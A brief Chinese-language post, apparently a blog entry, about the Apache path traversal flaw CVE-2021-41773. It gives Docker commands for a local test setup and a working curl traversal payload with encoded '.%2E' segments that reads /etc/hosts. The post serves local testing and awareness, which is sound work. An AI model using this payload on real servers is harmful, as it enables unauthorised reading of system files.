就是 > CVE-2021-41773
Apache 也在 10/7 號更新了版本 CHANGES_2.4.51
↑ 它說影響範圍是 2.4.49 與 2.4.50 版本,(舊版本是沒有的)
可以 POC 測試 >> /CVE-2021-41773
用 docker 測試
git clone https://github.com/masahiro331/CVE-2021-41773.git
cd CVE-2021-41773
docker build -t cve-2021-41773 .
docker run -d -p 8080:80 cve-2021-41773
curl http://localhost:8080/cgi-bin/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/etc/hosts
留言